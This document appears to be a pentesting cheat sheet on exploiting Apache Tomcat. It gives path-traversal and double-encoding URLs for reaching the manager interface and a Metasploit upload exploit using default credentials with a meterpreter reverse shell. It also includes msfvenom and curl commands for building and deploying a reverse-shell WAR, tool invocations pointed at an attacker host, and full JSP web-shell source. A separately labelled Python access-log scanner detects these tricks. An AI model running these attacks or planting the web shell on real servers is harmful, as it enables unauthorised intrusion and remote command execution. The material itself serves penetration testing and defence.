Exploitation

Topics

Common Vulnerabilities

  1. Password Backtrace Disclosure: visiting /auth.jsp might reveal passwords in backtraces.

  2. Double URL Encoding: vulnerabilities like CVE-2007-1860 allow management interface access via:

    pathTomcat/%252E%252E/manager/html

  3. Insecure Example Scripts: Apache Tomcat versions 4.x–7.x include example applications susceptible to XSS or information disclosure. Examples:

    • /examples/jsp/num/numguess.jsp

    • /examples/servlet/HelloWorldExample

    Check and restrict access to these paths.

  4. Path Traversal: exploit path traversal with:

    <tomcat_target_ip>/lalala/..;/manager/html

    or

    http://<tomcat_target_ip>/;param=value/manager/html
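As an added defensive example, not part of this page's original content, the following Python scans Tomcat access-log lines for the path tricks listed above (double encoding, `..;/`, `;param=value/`) and for deployments through the manager. LOG_LINES are constructed samples; the script assumes the default combined AccessLogValve format and decodes twice only to cover the mod_jk double-decoding case (CVE-2007-1860), which stock Tomcat does not do on its own.

```python
import re
from urllib.parse import unquote

# Combined-format access log lines as Tomcat's AccessLogValve writes them.
# These are constructed samples, not lines from any real server.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /lalala/..;/manager/html HTTP/1.1" 401 -',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /docs/%252E%252E/manager/html HTTP/1.1" 200 -',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 -',
    '10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET /examples/servlet/HelloWorldExample HTTP/1.1" 200 -',
    '10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /index.jsp HTTP/1.1" 200 -',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SENSITIVE = ("/manager/", "/host-manager/", "/examples/")

def normalize(raw_path):
    """Approximate the path the container will actually route: decode twice (covers
    %252E%252E in the double-decoding case), drop ';param' from every segment (the
    ..;/ and ;param=value/ tricks), then resolve '.' and '..' segments."""
    path = raw_path.split("?", 1)[0]
    path = unquote(unquote(path))
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)

def classify(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    src, method, raw, status = m.groups()
    norm = normalize(raw)
    tags = []
    if norm.startswith(SENSITIVE) and not raw.startswith(SENSITIVE):
        tags.append("obfuscated-path")  # sensitive app reached only after normalization
    if norm.startswith("/manager/text/deploy") or (method == "PUT" and norm.startswith("/manager/")):
        tags.append("war-deploy")       # application deployment through the manager
    if norm.startswith("/examples/"):
        tags.append("examples-app")     # example webapp should not be reachable in production
    return {"src": src, "method": method, "raw": raw, "normalized": norm, "status": status, "tags": tags}

def scan(lines):
    hits = [classify(l) for l in lines]
    return [h for h in hits if h and h["tags"]]
```

Feed it real access_log lines instead of LOG_LINES and review every hit; a 401 on an obfuscated path is still a probe worth correlating with later successful deployments from the same source.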

Using Metasploit Framework

Leverage the tomcat_mgr_upload exploit available in Metasploit for Tomcat file upload vulnerabilities. Launch Metasploit and execute the following commands:

msfconsole -q
search tomcat_mgr_upload
use 3
set rhosts <tomcat_target_ip>
set rport 8080
set httpusername admin
set httppassword password
set payload linux/x86/meterpreter_reverse_tcp
exploit

After exploitation, a reverse shell is obtained, allowing command execution via the meterpreter shell.

Remote Code Execution (RCE)

If you gain access to the /manager/html interface, you can upload and deploy a .war file to achieve RCE.

  • Example:

    curl --upload-file shell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/shell"

Metasploit can automate this:

use exploit/multi/http/tomcat_mgr_upload

To create a reverse shell WAR file:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o shell.war

Other Methods

  1. TomcatWarDeployer: deploy shells or bind shells via:

    ./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

  2. Clusterd: automate testing with:

    clusterd.py -i <attacker_machine> -a tomcat -v 5.5 --gen-payload <tomcat_target_ip>:4444 --deploy shell.war

  3. Manual Web Shell: example JSP for command execution:

    <FORM METHOD=GET ACTION='index.jsp'>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
    </FORM>
    <%@ page import="java.io.*" %>
    <%
       String cmd = request.getParameter("cmd");
       String output = "";
       String s;
       if(cmd != null) {
          Process p = Runtime.getRuntime().exec(cmd,null,null);
          BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
          while((s = sI.readLine()) != null) { output += s+"<br>"; }
       }
    %>
    <pre><%=output %></pre>

    Package it into a WAR file and upload it.
